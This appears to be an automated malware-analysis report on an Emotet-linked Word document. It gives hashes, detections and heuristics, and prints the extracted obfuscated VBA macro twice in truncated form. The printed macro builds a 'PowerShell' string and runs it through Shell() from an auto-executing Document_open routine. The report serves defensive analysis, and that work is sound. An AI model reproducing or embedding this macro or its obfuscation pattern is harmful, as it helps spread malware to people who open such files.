Emotet Office (OLE) malware analysis — malicious · 98033e5dfd9275c4

MALICIOUS

Office (OLE)

131.2 KB Created: 2018-06-18 10:10:00 Authoring application: Microsoft Office Word First seen: 2019-01-11

MD5: 8da18d2b10a77c086b297265e28820d1 SHA-1: ccc6b3e7937629b4cb972c217bd8d210162cc31a SHA-256: 98033e5dfd9275c4ccbc5273ecb8372325835dfa7a55bb565c14e704ca04b7df

222 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The critical heuristic 'OLE_VBA_SHELL' and the 'Document_Open' macro firing indicate that the macros are designed to execute commands. The ClamAV detection explicitly names this as 'Doc.Downloader.Emotet-7067302-0', strongly suggesting the Emotet family. The VBA script attempts to construct and execute a PowerShell command, likely to download and run a secondary payload.

Heuristics 6

ClamAV: Doc.Downloader.Emotet-7067302-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-7067302-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 19277 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	19277 bytes
SHA-256: `26cca87ce32d209f022a87371691f0509f7503854fbf4d56bccd6e174e0ccc82`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "nADZFJiR" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function QURDC() On Error Resume Next homTR = PESXW zQciSj = 70406 / 50310 qijnlw = 68723 + 63397 GLVRPN = Atn(Nkhmz + Sin(fTEcO) - 28356 / 6289) fUpRSl = MERaFa * CSng(23013 * Fix(54168)) * VNNzF + CSng(PiXCT + CLng(Djpzwz)) / (rIKswk * CSng(85648) - (10454 + Fix(uqPWE) - (46375 + CLng(kWhlY - Log(KtQRR) - 16701 + Int(cbIbk))))) SLwLE = IjPUW UXVcp = 95842 / 46637 aLdUvc = 2499 + 44942 jGDSF = Atn(watPuS + Sin(fswUu) - 80466 / 13455) tMhzIu = mwdQnR * CSng(1668 * Fix(95268)) * COOpX + CSng(qjwXFw + CLng(XHjCU)) / (cFVIKW * CSng(34926) - (42496 + Fix(FCIKjJ) - (85543 + CLng(miazV - Log(Bkouc) - 46654 + Int(hkwNV))))) kBWXJH = WLmFi rjUQj = 1942 / 86304 aHVub = 53988 + 86132 tZJtT = Atn(MfVZj + Sin(jjffh) - 61219 / 2736) lQCXOA = ihpQc * CSng(46117 * Fix(3898)) * DwHwTk + CSng(EZThi + CLng(BbANF)) / (nCJYzD * CSng(99918) - (49475 + Fix(ZEtBY) - (62087 + CLng(vUfZt - Log(LdEjW) - 97982 + Int(GpCXdO))))) tzRBD = hsoZmE nPCVB = 81555 / 56892 fIfzQ = 35090 + 95805 MmAwr = Atn(VnCKZ + Sin(MZwqHD) - 74219 / 13472) JUrbzi = EsMSR * CSng(33319 * Fix(89604)) * DIwZK + CSng(UvaSE + CLng(XoQQi)) / (UbjiwK * CSng(48182) - (21569 + Fix(SZmQt) - (71865 + CLng(crTsnR - Log(ZRJuWp) - 31440 + Int(wjWwTm))))) QURDC = IqANmZlVNk + Chr$(wuWuLu + 80 + wCnSB) + "OwerSH" + triZaKFA + EhMfihYGl + oESbIjbv + uEDutJMkNin + KYrLDkLlud UOSNf = hrpUF MVAzr = 3588 / 96130 GjzGEC = 99532 + 87973 oDEHu = Atn(qnhJPq + Sin(ftNhq) - 9350 / 86558) sjfLZ = wdpMr * CSng(69395 * Fix(16146)) * HhIuO + CSng(SiACij + CLng(EPzndJ)) / (ElVrFL * CSng(87907) - (21735 + Fix(aMuwWp) - (47897 + CLng(IkvwOj - Log(dtqtOs) - 46427 + Int(adIWL))))) IolNd = wIprA ASEFtO = 34603 / 56306 pLjiXr = 85449 + 40591 isTMiN = Atn(RNDDB + Sin(iicTPU) - 1451 / 66015) wRRSC = iEKCYs * CSng(39126 * Fix(25908)) * wcVLLW + CSng(VzGYBo + CLng(ZAJcG)) / (wBuds * CSng(97967) - (75917 + Fix(RhtVzm) - (64046 + CLng(VjJqDv - Log(Ldauh) - 71640 + Int(PPNpz))))) End Function Function iXMfslajjD(DjbckuznLR) On Error Resume Next rUHKn = SrOfj AUGtOo = 3829 / 63020 aWssHY = 73788 + 93136 PEibJ = Atn(jXwVi + Sin(wSJHS) - 99488 / 6268) UzNwrB = dTpzk * CSng(91959 * Fix(90866)) * DQAPX + CSng(fJhla + CLng(MMmqfj)) / (orYOl * CSng(22306) - (78138 + Fix(VBBNia) - (58542 + CLng(qXWZqo - Log(fNRFvQ) - 64524 + Int(UDmGWi))))) vAtFaz = OczAH QsuKsp = 41644 / 53987 pVkMtl = 63504 + 21461 wWOBJ = Atn(tjjmuo + Sin(wBiHa) - 85839 / 59110) TGTmBv = oMVFzN * CSng(8129 * Fix(1723)) * MIKqQD + CSng(XtLwW + CLng(VCUVNX)) / (oYlNU * CSng(4367) - (3833 + Fix(azbRj) - (73376 + CLng(cWUfQm - Log(tqwcHr) - 35094 + Int(izjnln))))) ABpoM = PNGccJcPr + Shell(qcTcNIpfq + DjbckuznLR + VtjYnLNb, 40671 - 40671) zhlqiK = wcDzWX LotozE = 70019 / 81551 pMDsm = 55493 + 34169 jSVmAB = Atn(hEOzbn + Sin(JjTHF) - 76932 / 30265) MtJcf = TrRHXG * CSng(92029 * Fix(82487)) * uUXDQs + CSng(timBCh + CLng(zCsKM)) / (HkduTz * CSng(45491) - (21450 + Fix(cATwSI) - (46429 + CLng(ZBfPz - Log(pibmjR) - 8212 + Int(wjInKq))))) End Function Private Sub Document_open() On Error Resume Next YjlEP = oAYEdH KAtwGF = 72330 / 93252 qQLnCo = 60558 + 9966 wsIWEO = Atn(NAVHI + Sin(DBFdP) - 24635 / 56300) NqGht = EhwOj * CSng(3506 * Fix(88748)) * daWrI + CSng(kSWoDD + CLng(mQhCA)) / (fYzcdj * CSng(72957) - (47384 + Fix(AIniv) - (28390 + CLng(NjwWcS - Log(URdppR) - 32611 + Int(MjJPd))))) XtLXV = iAZlj cjuVPV = 57856 / 80449 HijON = 27193 + 13249 uMSqDQ = Atn(BjYhC + Sin(dRWwV) - 56217 / 70940) tCzzn = OazIfR * CSng(92754 * Fix(93593)) * XznNQd + CSng(IzXtsK + CLng(srXpw)) / (ilFbuZ * CSng(49755) - (51603 + Fix(wqULHJ) - (29113 + CLng(AqcCt - Log(cuAEK) - 9676 + Int(IbzRw))))) Application.Run CBPWwMXnV + "iXMfslajjD" + BoznzQ, GlrsLKwp + QURDC + WjioRw wQzTKP = RKWuz ITLMfJ = 79523 / 85985 vWTBEb = 99402 + 72223 LEWfTK = ... (truncated)

SHA-256: 26cca87ce32d209f022a87371691f0509f7503854fbf4d56bccd6e174e0ccc82

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "nADZFJiR"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function QURDC()
On Error Resume Next
homTR = PESXW
zQciSj = 70406 / 50310
qijnlw = 68723 + 63397
GLVRPN = Atn(Nkhmz + Sin(fTEcO) - 28356 / 6289)
fUpRSl = MERaFa * CSng(23013 * Fix(54168)) * VNNzF + CSng(PiXCT + CLng(Djpzwz)) / (rIKswk * CSng(85648) - (10454 + Fix(uqPWE) - (46375 + CLng(kWhlY - Log(KtQRR) - 16701 + Int(cbIbk)))))
SLwLE = IjPUW
UXVcp = 95842 / 46637
aLdUvc = 2499 + 44942
jGDSF = Atn(watPuS + Sin(fswUu) - 80466 / 13455)
tMhzIu = mwdQnR * CSng(1668 * Fix(95268)) * COOpX + CSng(qjwXFw + CLng(XHjCU)) / (cFVIKW * CSng(34926) - (42496 + Fix(FCIKjJ) - (85543 + CLng(miazV - Log(Bkouc) - 46654 + Int(hkwNV)))))
kBWXJH = WLmFi
rjUQj = 1942 / 86304
aHVub = 53988 + 86132
tZJtT = Atn(MfVZj + Sin(jjffh) - 61219 / 2736)
lQCXOA = ihpQc * CSng(46117 * Fix(3898)) * DwHwTk + CSng(EZThi + CLng(BbANF)) / (nCJYzD * CSng(99918) - (49475 + Fix(ZEtBY) - (62087 + CLng(vUfZt - Log(LdEjW) - 97982 + Int(GpCXdO)))))
tzRBD = hsoZmE
nPCVB = 81555 / 56892
fIfzQ = 35090 + 95805
MmAwr = Atn(VnCKZ + Sin(MZwqHD) - 74219 / 13472)
JUrbzi = EsMSR * CSng(33319 * Fix(89604)) * DIwZK + CSng(UvaSE + CLng(XoQQi)) / (UbjiwK * CSng(48182) - (21569 + Fix(SZmQt) - (71865 + CLng(crTsnR - Log(ZRJuWp) - 31440 + Int(wjWwTm)))))
QURDC = IqANmZlVNk + Chr$(wuWuLu + 80 + wCnSB) + "OwerSH" + triZaKFA + EhMfihYGl + oESbIjbv + uEDutJMkNin + KYrLDkLlud
UOSNf = hrpUF
MVAzr = 3588 / 96130
GjzGEC = 99532 + 87973
oDEHu = Atn(qnhJPq + Sin(ftNhq) - 9350 / 86558)
sjfLZ = wdpMr * CSng(69395 * Fix(16146)) * HhIuO + CSng(SiACij + CLng(EPzndJ)) / (ElVrFL * CSng(87907) - (21735 + Fix(aMuwWp) - (47897 + CLng(IkvwOj - Log(dtqtOs) - 46427 + Int(adIWL)))))
IolNd = wIprA
ASEFtO = 34603 / 56306
pLjiXr = 85449 + 40591
isTMiN = Atn(RNDDB + Sin(iicTPU) - 1451 / 66015)
wRRSC = iEKCYs * CSng(39126 * Fix(25908)) * wcVLLW + CSng(VzGYBo + CLng(ZAJcG)) / (wBuds * CSng(97967) - (75917 + Fix(RhtVzm) - (64046 + CLng(VjJqDv - Log(Ldauh) - 71640 + Int(PPNpz)))))
End Function
Function iXMfslajjD(DjbckuznLR)
On Error Resume Next
rUHKn = SrOfj
AUGtOo = 3829 / 63020
aWssHY = 73788 + 93136
PEibJ = Atn(jXwVi + Sin(wSJHS) - 99488 / 6268)
UzNwrB = dTpzk * CSng(91959 * Fix(90866)) * DQAPX + CSng(fJhla + CLng(MMmqfj)) / (orYOl * CSng(22306) - (78138 + Fix(VBBNia) - (58542 + CLng(qXWZqo - Log(fNRFvQ) - 64524 + Int(UDmGWi)))))
vAtFaz = OczAH
QsuKsp = 41644 / 53987
pVkMtl = 63504 + 21461
wWOBJ = Atn(tjjmuo + Sin(wBiHa) - 85839 / 59110)
TGTmBv = oMVFzN * CSng(8129 * Fix(1723)) * MIKqQD + CSng(XtLwW + CLng(VCUVNX)) / (oYlNU * CSng(4367) - (3833 + Fix(azbRj) - (73376 + CLng(cWUfQm - Log(tqwcHr) - 35094 + Int(izjnln)))))
ABpoM = PNGccJcPr + Shell(qcTcNIpfq + DjbckuznLR + VtjYnLNb, 40671 - 40671)
zhlqiK = wcDzWX
LotozE = 70019 / 81551
pMDsm = 55493 + 34169
jSVmAB = Atn(hEOzbn + Sin(JjTHF) - 76932 / 30265)
MtJcf = TrRHXG * CSng(92029 * Fix(82487)) * uUXDQs + CSng(timBCh + CLng(zCsKM)) / (HkduTz * CSng(45491) - (21450 + Fix(cATwSI) - (46429 + CLng(ZBfPz - Log(pibmjR) - 8212 + Int(wjInKq)))))
End Function
Private Sub Document_open()
On Error Resume Next
YjlEP = oAYEdH
KAtwGF = 72330 / 93252
qQLnCo = 60558 + 9966
wsIWEO = Atn(NAVHI + Sin(DBFdP) - 24635 / 56300)
NqGht = EhwOj * CSng(3506 * Fix(88748)) * daWrI + CSng(kSWoDD + CLng(mQhCA)) / (fYzcdj * CSng(72957) - (47384 + Fix(AIniv) - (28390 + CLng(NjwWcS - Log(URdppR) - 32611 + Int(MjJPd)))))
XtLXV = iAZlj
cjuVPV = 57856 / 80449
HijON = 27193 + 13249
uMSqDQ = Atn(BjYhC + Sin(dRWwV) - 56217 / 70940)
tCzzn = OazIfR * CSng(92754 * Fix(93593)) * XznNQd + CSng(IzXtsK + CLng(srXpw)) / (ilFbuZ * CSng(49755) - (51603 + Fix(wqULHJ) - (29113 + CLng(AqcCt - Log(cuAEK) - 9676 + Int(IbzRw)))))
Application.Run CBPWwMXnV + "iXMfslajjD" + BoznzQ, GlrsLKwp + QURDC + WjioRw
wQzTKP = RKWuz
ITLMfJ = 79523 / 85985
vWTBEb = 99402 + 72223
LEWfTK = 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.